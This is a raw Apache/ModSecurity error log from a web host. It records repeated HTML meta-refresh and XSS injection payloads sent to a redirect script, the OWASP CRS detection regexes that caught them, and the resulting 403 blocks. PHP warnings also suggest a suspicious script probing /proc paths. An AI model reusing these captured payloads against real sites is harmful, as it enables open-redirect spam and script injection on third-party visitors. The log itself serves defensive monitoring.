[Mon May 11 22:56:04.715138 2026] [security2:error] [pid 1605480:tid 1605522] [client 194.233.64.127:51370] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://sso.upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://sso.upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguru..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZB2Cvzd_nyNfUm8JOAAAAQA"]
[Mon May 11 22:56:04.715797 2026] [security2:error] [pid 1605480:tid 1605522] [client 194.233.64.127:51370] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-s..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZB2Cvzd_nyNfUm8JOAAAAQA"]
[Mon May 11 22:56:04.716015 2026] [security2:error] [pid 1605480:tid 1605522] [client 194.233.64.127:51370] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/ /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-da..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZB2Cvzd_nyNfUm8JOAAAAQA"]
[Mon May 11 22:56:04.716133 2026] [security2:error] [pid 1605480:tid 1605522] [client 194.233.64.127:51370] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-pergur..."] [severity "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZB2Cvzd_nyNfUm8JOAAAAQA"]
[Mon May 11 22:56:04.716378 2026] [security2:error] [pid 1605480:tid 1605522] [client 194.233.64.127:51370] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZB2Cvzd_nyNfUm8JOAAAAQA"]
[Mon May 11 22:56:04.716989 2026] [security2:error] [pid 1605480:tid 1605522] [client 194.233.64.127:51370] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZB2Cvzd_nyNfUm8JOAAAAQA"]
[Mon May 11 22:56:04.717273 2026] [security2:error] [pid 1605480:tid 1605522] [client 194.233.64.127:51370] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZB2Cvzd_nyNfUm8JOAAAAQA"]
[Mon May 11 22:56:05.371007 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:51404] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://sso.upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://sso.upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguru..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZaFW67LJTsgN3jQVmAAAAAg"]
[Mon May 11 22:56:05.372076 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:51404] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-s..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZaFW67LJTsgN3jQVmAAAAAg"]
[Mon May 11 22:56:05.372309 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:51404] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/ /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-da..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZaFW67LJTsgN3jQVmAAAAAg"]
[Mon May 11 22:56:05.372422 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:51404] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-pergur..."] [severity "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZaFW67LJTsgN3jQVmAAAAAg"]
[Mon May 11 22:56:05.372647 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:51404] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://sso.Upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZaFW67LJTsgN3jQVmAAAAAg"]
[Mon May 11 22:56:05.373283 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:51404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZaFW67LJTsgN3jQVmAAAAAg"]
[Mon May 11 22:56:05.373542 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:51404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJCZaFW67LJTsgN3jQVmAAAAAg"]
[Mon May 11 22:56:27.116072 2026] [security2:error] [pid 1606352:tid 1606430] [client 43.130.14.245:50588] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/"] [unique_id "agJCe3o_DFxNSZVmaX3ahQAAAMs"]
[Mon May 11 22:56:30.919967 2026] [security2:error] [pid 1588898:tid 1589210] [client 43.166.226.186:36232] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/ossature-bois/"] [unique_id "agJCfqFW67LJTsgN3jQVtQAAABU"]
[Mon May 11 22:58:05.974099 2026] [autoindex:error] [pid 1601130:tid 1601174] [client 34.242.6.163:34436] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:58:05.978120 2026] [core:error] [pid 1601130:tid 1601174] [client 34.242.6.163:34436] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:58:23.284237 2026] [security2:error] [pid 1605480:tid 1605537] [client 43.155.188.157:52576] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "classist.fr"] [uri "/"] [unique_id "agJC7x2Cvzd_nyNfUm8J0QAAAQ8"]
PHP Warning:  filesize(): stat failed for /proc/101/task/101/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/101/task/101/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/101/task/101/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/101/task/101/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/101/task/101/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/101/task/101/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:58:35.170820 2026] [security2:error] [pid 1588898:tid 1588912] [client 119.28.89.249:53142] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/user/passwordforgotten.php"] [unique_id "agJC-6FW67LJTsgN3jQWTgAAAA0"]
[Mon May 11 22:58:40.517813 2026] [security2:error] [pid 1601130:tid 1601160] [client 194.233.64.127:57160] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://oke.zone/viewtopic.php?id=535408>www.7d.org.ua</a><meta http-equiv=refresh content=0;url=https://oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAHEgAO_835W6c1mg8wAAAEo"]
[Mon May 11 22:58:40.522263 2026] [security2:error] [pid 1601130:tid 1601160] [client 194.233.64.127:57160] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Www.7D.Org.Ua</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Www.7D.Org.Ua</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAHEgAO_835W6c1mg8wAAAEo"]
[Mon May 11 22:58:40.528568 2026] [security2:error] [pid 1601130:tid 1601160] [client 194.233.64.127:57160] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Www.7D.Org.Ua</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSenso [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAHEgAO_835W6c1mg8wAAAEo"]
[Mon May 11 22:58:40.529597 2026] [security2:error] [pid 1601130:tid 1601160] [client 194.233.64.127:57160] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Www.7D.Org.Ua</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAHEgAO_835W6c1mg8wAAAEo"]
[Mon May 11 22:58:40.529785 2026] [security2:error] [pid 1601130:tid 1601160] [client 194.233.64.127:57160] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Www.7D.Org.Ua</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAHEgAO_835W6c1mg8wAAAEo"]
